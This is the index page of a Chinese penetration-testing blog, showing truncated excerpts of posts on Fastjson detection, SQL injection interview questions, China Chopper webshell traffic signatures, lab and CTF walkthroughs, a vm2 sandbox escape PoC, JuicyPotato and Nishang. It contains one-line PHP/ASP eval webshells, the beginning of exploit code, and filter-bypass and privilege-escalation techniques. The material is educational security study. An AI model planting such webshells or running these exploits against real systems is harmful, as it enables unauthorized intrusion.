IceWindy's Blog

环境 Ubuntu22.04 LTS Docker Engine Community Version 28.1.0 问题介绍 参照了网上众多教程配置Docker daemon.json文件，基本都是一种方法 12345sudo mkdir -p /etc/dockersudo vim /etc/docker/daemon.json// 修改相关配置文件sudo systemctl daemon-reload && sudo systemctl restart docker 都是修改配置文件后，重载daemon和重启docker服务。以前使用这种方法是没问题，不知道为什么最近用相同的方法已经无法使用了，使用docker info查看Mirrors之类的配置也是为空 1sudo docker info|grep Mirrors -A 1 解决方案 在折磨了我解决一个小时之后，我在网上找到了一篇解决方案 【踩坑】Docker deamon.json 文件修改之后重启不生效_docker daemon.json 不生效-CSDN博客 总而言之就是，直接重启没用了，首先要停止 ...

Fastjson漏洞 判断是否使用Fastjson 本次测试以vulhub提供的版本1.2.24和1.2.45为例 单{报错 123456POST / HTTP/1.1Host: 192.168.200.130:8090Content-Type: application/jsonContent-Length: 385\u007B 在1.2.24版本，使用非闭合的{会导致500报错 12345678910111213HTTP/1.1 500Content-Type: application/jsonDate: Sun, 20 Apr 2025 14:01:08 GMTConnection: closeContent-Length: 161{ "timestamp": 1745157668563, "status": 500, "error": "Internal Server Error", "message": "syntax erro ...

国誉2024初筛 用过什么安全设备 给你一个登录框，可能有什么漏洞 sql注入、xss、csrf、会话劫持 sql注入的类型 字符、布尔、报错、时间盲注、联合、堆叠、宽字节、XFF 错误注入使用的方法有哪些 extractValue、updateXml、floor 宽字节注入的编码格式是什么 GBK 时间盲注不能使用工具或者脚本，怎么样注入较快 尝试外带查询 优化查询策略采用二分查找法 简化数据集 sqlmap的level和risk有什么区别，level各个等级代表什么意思 –level和–risk是数字愈大级别越高，–level有1-5，–risk有1-3 level侧重点在于注入点。risk侧重点在于注入的方法和攻击者愿意承担的风险。 level默认等级会测试get和post请求中的参数。level2会测cookie。level3会测ua和refferer。level4-5会测各种payload和边界条件。 risk默认等级安全第一，风险低，只测默认的几种注入方法。risk2会尝试更多类型的注入，如时间盲注等。risk3会尝试更多方式的注入，有可能会更新数据库 ...

菜刀流量特征 静态特征 菜刀用的是一句话木马，特征很明显 123PHP: <?php @eval([$_post['hacker']]); ?>ASP: <% eval request("hacker")%>ASP.NET: <%@ Page Language="Javascript"%><% eval(Request.Item["hacker"],"unsafe");%> 动态特征 payload在请求体中，采用url编码+base64编码，payload部分是明文传输； payload中有eval或assert、base64_decode这样的字符； payload中有默认固定的&z0=QGluaV9zZXQ…这样base64加密的攻击载荷，参数z0对应$_POST[z0]接收到的数据，且固定为QGluaV9zZXQ开头。 进行base64解码后可看到代码：@ini_set(“display_errors”,“ ...

下载地址：https://www.vulnhub.com/entry/westwild-11,338/ 用netdiscover扫描本网段的存活主机 确定机子为VMware的主机，ip为192.168.31.89 端口扫描 tcp端口扫描 详细信息扫描 访问网页 没什么信息，源码里也什么都没有。 目录爆破 既然没东西，那还是目录爆破一下，看看有什么可用目录 一个没有权限，一个是网站主页，没有价值。 smb共享（445端口） 在详细信息扫描那里，我们看到了靶机开启了SMB服务，也就是存在共享文件 我们用enum4linux枚举一下用户和共享文件夹 可能为空密码，且存在一个wave的文件夹，直接用smbclient访问 还真没密码啊？ 应该是什么编码，解码一下 base64解码得到用户名密码和flag1 提权 用上面得到的用户名密码通过ssh连接 这个用户看起来并没有提权到root的权限，我们来看看这个用户有什么有写权限的文件 使用下面这个命令我们可以查到 1find / -perm 0777 -type f 2>/dev/null 直接执行一下这个.s ...

简单 cool 12345678910111213<?phpif(isset($_GET['a'])){ $a = $_GET['a']; if(is_numeric($a)){ echo "no"; } if(!preg_match("/flag|system|php/i", $a)){ eval($a); }}else{ highlight_file(__FILE__);}?> 不能用尝试执行system，我们来试试用passthru()执行一下ls 很好，进展很顺利，由于过滤了flag，我们直接用cat *来试试 ok，成功取得flag。 upload 打开源代码。发现有个注释，很像某种传值 试试加上去，发现出现了代码 审计一下php代码，发现是通过字符串匹配，然后将其替换为空来过滤掉相关后缀的文件。 先来试试上个图片马，发现似乎不会执行 ...

连接并检查稳定性 信息收集 tcp端口扫描 22 80 3000 8080开放，进行详细扫描 udp扫描 没有有用价值的内容 web网页尝试 首先我们需要在hosts文件中添加一行记录 访问查看网页 发现是个nodejs代码沙盒测试环境。点开about us页面 我们发现是基于vm2的库搭建的沙盒，并且超链接给出了我们vm2的版本信息 对于沙盒类的代码执行，我们很容易想到的是沙盒逃逸类的漏洞，我们可以去检索一下vm2相关的沙盒逃逸类的漏洞，以"vm2 sandbox escape vulnerability"类似的关键词在搜索引擎检索 检索到一个漏洞，并且版本符合3.9.16。打开利用的pocSandbox Escape in [email protected] (github.com) 1234567891011121314151617181920212223const {VM} = require("vm2");const vm = new VM();const code = `err = {};c ...

Nmap扫描 tcp端口扫描 udp端口扫描 无开放端口 详细信息扫描 服务分别是 80：微软的IIS服务器，版本号为10.0，一个web服务 135：windows远程过程调用 服务器系统为Windows Server，大概率为2016 80端口尝试 由于80端口开放，且为一个Web服务，我们来访问看看 应该是一个提供虚拟主机服务的网站，网页使用到的技术我们可以用工具看到 发现在support页面存在一个表单，我们随便填写一些信息提交看看有什么反应 发现连接不上提交到的站点，那似乎没有利用价值了。通过查看源码可知，这个网站是该地址的镜像网站，所以我们连接不上 并且我们得到了一个信息，网页是由HTTrack Website Copier/3.x制作的，但是通过我们检索，发现并没有什么可以利用的漏洞。 目录爆破 尝试使用目录爆破，看看有没有可用的目录 并没有扫描可用的信息。 135端口尝试 由于135端口是一个rpc服务，所以首先想到的是rpcclient。 使用rpcclient尝试与135端口进行连接 然而并不可行。我们来尝试一下其他的rpc工具，例如python- ...

JuicyPotato简介 JuciyPotato俗称烂土豆，是一个基于MS16-075漏洞利用工具RottenPotatoN上改进的内核提权工具。ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM. (github.com) 功能简介 据页面的介绍，烂土豆可以让你做下面这些事情 Target CLISID 选择任何你想要的CLISID。在这里有一个列表可以找到 COM Listening port 设置DOM监听端口 COM Listening IP address 设置DOM监听的IP地址 Process creation mode 进程创建的模式。可以选择下面几种模式： CreateProcessWithToken （需要 SeImpersonate 权限） CreatePro ...

Nishang是一个针对Powershell的渗透测试工具，集成了框架、脚本和各种Payload，包括了下载和执行、键盘记录、DNS、延时命令等脚本。 Nishang安装 首先我们需要去到Github上下载Nishang，直接从Releases下载即可。下载下来后解压我们得到一个文件夹。 目录 这文件夹代表了Nishang的不同模块 在渗透测试中，这些工具往往我们需要提取出来使用，而不是一整个贴到被渗透服务器中，因此需要我们对Nishang的目录结构有所了解。 Bypass执行策略 Powershell的默认执行策略是Restricted的，而Restricted是不允许任何脚本运行的。因此我们需要一些手段去Bypass执行策略。Bypass执行策略的十五种方法可以参考这篇https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/。 从别人那参考来的三个常用的方式： 1230. Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Un ...